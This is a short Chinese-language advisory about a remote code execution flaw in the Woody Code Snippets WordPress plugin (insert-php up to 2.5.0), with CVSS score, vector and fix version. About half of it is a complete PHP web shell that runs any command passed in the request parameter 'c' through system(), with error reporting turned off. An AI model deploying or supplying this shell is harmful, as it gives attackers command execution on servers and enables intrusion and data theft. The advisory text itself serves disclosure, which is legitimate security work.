Woody代码片段 – WordPress的插入页眉页脚代码、AdSense广告插件在所有版本,包括2.5.0及更早版本中,通过'insert_php'短代码存在远程代码执行漏洞。这是由于该插件未限制高级授权用户使用该功能。这使得经过身份验证的攻击者,具有贡献者级别及以上访问权限,能够在服务器上执行代码。
基础评分:9.9 严重
向量:CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
软件类型:插件
软件标识:insert-php
修复措施:更新至版本2.5.1或更新的补丁版本
受影响版本:<= 2.5.0
<?php
error_reporting(0);
$cmd = "$_REQUEST[c]";
if ($cmd == "") {
$cmd = "echo > NUL";
}
@system("$cmd");
?>